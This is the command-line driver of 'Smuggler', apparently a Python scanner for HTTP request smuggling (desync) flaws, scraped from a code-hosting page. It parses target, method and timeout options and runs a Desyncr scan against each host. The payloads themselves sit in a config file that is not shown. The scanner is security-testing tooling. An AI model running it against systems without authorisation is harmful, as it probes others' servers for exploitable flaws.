Parser.add_argument('-u', '--url', help="Target URL with Endpoint")
|
||||
Parser.add_argument('-c', action="store_true",help="")
|
||||
Parser.add_argument('-v', '--vhost', default="", help="Specify a virtual host")
|
||||
Parser.add_argument('-x', '--exit_early', action='store_true',help="Exit scan on first finding")
|
||||
Parser.add_argument('-m', '--method', default="GET", help="HTTP method to use (e.g GET, POST) Default: GET")
|
||||
Parser.add_argument('-l', '--log', help="Specify a log file")
|
||||
Parser.add_argument('-q', '--quiet', action='store_true', help="Quiet mode will only log issues found")
|
||||
Parser.add_argument('-t', '--timeout', default=5.0, help="Socket timeout value Default: 5")
|
||||
Parser.add_argument('--no-color', action='store_true', help="Suppress color codes")
|
||||
Parser.add_argument('--configfile', default="default.py", help="Filepath to the configuration file of payloads")
|
||||
Args = Parser.parse_args() # returns data from the options specified (echo)
|
||||
|
||||
NOCOLOR = Args.no_color
|
||||
if os.name == 'nt':
|
||||
NOCOLOR = True
|
||||
|
||||
Version = "v1.1"
|
||||
banner(Version)
|
||||
|
||||
if sys.version_info < (3, 0):
|
||||
print_info("Error: Smuggler requires Python 3.x")
|
||||
sys.exit(1)
|
||||
|
||||
# If the URL argument is not specified then check stdin
|
||||
if Args.url is None:
|
||||
if sys.stdin.isatty():
|
||||
print_info("Error: no direct URL or piped URL specified\n")
|
||||
Parser.print_help()
|
||||
exit(1)
|
||||
Servers = sys.stdin.read().split("\n")
|
||||
else:
|
||||
Servers = [Args.url + " " + Args.method]
|
||||
|
||||
FileHandle = None
|
||||
if Args.log is not None:
|
||||
try:
|
||||
FileHandle = open(Args.log, "w")
|
||||
except:
|
||||
print_info("Error: Issue with log file destination")
|
||||
print(Parser.print_help())
|
||||
sys.exit(1)
|
||||
|
||||
for server in Servers:
|
||||
# If the next on the list is blank, continue
|
||||
if server == "":
|
||||
continue
|
||||
# Tokenize
|
||||
server = server.split(" ")
|
||||
|
||||
# This is for the stdin case, if no method was specified default to GET
|
||||
if len(server) == 1:
|
||||
server += [Args.method]
|
||||
|
||||
# If a protocol is not specified then default to https
|
||||
if server[0].lower().strip()[0:4] != "http":
|
||||
server[0] = "https://" + server[0]
|
||||
|
||||
params = process_uri(server[0])
|
||||
method = server[1].upper()
|
||||
host = params[0]
|
||||
port = params[1]
|
||||
endpoint = params[2]
|
||||
SSLFlagval = params[3]
|
||||
configfile = Args.configfile
|
||||
|
||||
print_info("URL : %s"%(Fore.CYAN + server[0]), FileHandle)
|
||||
print_info("Method : %s"%(Fore.CYAN + method), FileHandle)
|
||||
print_info("Endpoint : %s"%(Fore.CYAN + endpoint), FileHandle)
|
||||
print_info("Configfile : %s"%(Fore.CYAN + configfile), FileHandle)
|
||||
print_info("Timeout : %s"%(Fore.CYAN + str(float(Args.timeout)) + Fore.MAGENTA + " seconds"), FileHandle)
|
||||
|
||||
sm = Desyncr(configfile, host, port, url=server[0], method=method, endpoint=endpoint, SSLFlag=SSLFlagval, logh=FileHandle, smargs=Args)
|
||||
sm.run()
|
||||
|
||||
|
||||
if FileHandle is not None:
|
||||
FileHandle.close()
|
Loading…
Reference in New Issue
Block a user